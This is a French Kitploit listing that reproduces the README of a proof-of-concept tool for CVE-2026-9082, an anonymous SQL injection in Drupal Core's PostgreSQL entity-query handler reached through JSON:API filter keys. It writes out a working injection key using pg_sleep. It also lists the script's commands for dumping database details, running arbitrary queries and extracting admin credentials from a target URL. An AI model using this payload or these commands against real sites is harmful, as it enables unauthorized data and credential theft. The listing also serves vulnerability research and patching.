Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/7h30th3r0n3/cve-2026-9082-drupal-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHub7h30th3r0n3/cve-2026-9082-drupal-poc

CVE-2026-9082-Drupal-PoC

PoC d'injection SQL PostgreSQL pour Drupal Core - CVE-2026-9082. PoC éthique pour la vulnérabilité Drupal permettant une injection SQL anonyme via le module JSON:API sur les sites utilisant PostgreSQL.

Voir le dépôt
2341il y a 3 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-9082 - Preuve de Concept d'Injection SQL PostgreSQL dans Drupal Core

Logo Drupal


Aperçu

Ce dépôt fournit une preuve de concept (PoC) éthique pour CVE-2026-9082, une vulnérabilité d'injection SQL Hautement Critique dans Drupal Core affectant tous les sites utilisant PostgreSQL exécutant Drupal 8.0 à 11.3.9.

Le défaut réside dans le gestionnaire de condition de requête d'entité PostgreSQL et peut être exploité par des utilisateurs anonymes (non authentifiés) via le module JSON:API, qui est activé par défaut depuis Drupal 9.

Avis officiel : SA-CORE-2026-004


Résumé de la vulnérabilité

Drupal Core inclut une API d'abstraction de base de données conçue pour assainir les requêtes et prévenir les injections SQL. Un défaut dans la classe de condition de requête d'entité spécifique à PostgreSQL (core/modules/pgsql/src/EntityQuery/Condition.php) permet à un attaquant d'injecter du SQL arbitraire via des clés de tableau contrôlées par l'utilisateur transmises via les paramètres de filtre JSON:API.

  • CVE ID : CVE-2026-9082
  • Avis : SA-CORE-2026-004
  • Logiciel affecté : Drupal Core
  • Versions affectées : 8.0.0 – 11.3.9 (PostgreSQL uniquement)
  • Corrigé dans : 11.3.10, 11.2.12, 10.6.9, 10.5.10
  • Gravité : Hautement Critique — 20/25 sur l'échelle de risque Drupal
  • Authentification : Aucune requise (anonyme)
  • Impact : Exfiltration de données, escalade de privilèges, RCE dans certaines configurations
  • Vecteur d'attaque : HTTP — clés de tableau de condition de filtre JSON:API

Comment ça fonctionne

  1. La méthode translateCondition() dans la classe Condition PostgreSQL itère sur $condition['value'] et utilise les clés du tableau pour construire des noms de placeholders PDO :
    $where_id = $where_prefix . $key;
  2. JSON:API permet aux utilisateurs anonymes de fournir des valeurs de filtre avec des clés de tableau arbitraires via des paramètres d'URL :
    filter[x][condition][value][MALICIOUS_KEY]=val
  3. Les placeholders nommés PDO ne sont composés que des caractères [a-zA-Z0-9_]. Lorsque la clé contient ), PDO arrête l'analyse du nom du placeholder — tout ce qui suit devient du SQL littéral injecté dans la requête.
  4. En envoyant une clé comme 1))/**/OR/**/(SELECT pg_sleep(5)) IS NOT NULL)--, l'attaquant ferme la clause IN() et ajoute du SQL arbitraire, tandis que la liaison pour :prefix_1 est satisfaite par une clé légitime 1 dans la même requête.

Références & Crédits

  • Avis : SA-CORE-2026-004
  • Commit de correctif : ea9524d9
  • Découvreur : michaelmaturi (crédité dans l'avis)

Avis légal

Cet outil est destiné uniquement aux tests de sécurité autorisés, à des fins éducatives et à la recherche éthique. L'accès non autorisé à des systèmes informatiques est illégal.


Installation

root@kitploit:~
git clone https://github.com/7h30th3r0n3/CVE-2026-9082-Drupal-PoC.git
cd CVE-2026-9082-Drupal-PoC
pip install requests rich

Utilisation (CLI)

root@kitploit:~
# Check if target is vulnerable
python3 CVE-2026-9082.py -u https://target.com --check

# Extract PostgreSQL version
python3 CVE-2026-9082.py -u https://target.com --version

# Extract database info (user + db name)
python3 CVE-2026-9082.py -u https://target.com --dbinfo

# Extract Drupal admin credentials (uid=1)
python3 CVE-2026-9082.py -u https://target.com --admin

# List database tables
python3 CVE-2026-9082.py -u https://target.com --tables

# Custom SQL query extraction
python3 CVE-2026-9082.py -u https://target.com --query "SELECT current_user"

# Use boolean-based extraction (faster but less reliable)
python3 CVE-2026-9082.py -u https://target.com --version -m bool

# Interactive mode (no arguments)
python3 CVE-2026-9082.py

Auteur

  • PoC développé par 7h30th3r0n3
  • Vulnérabilité découverte par michaelmaturi
Télécharger l’outil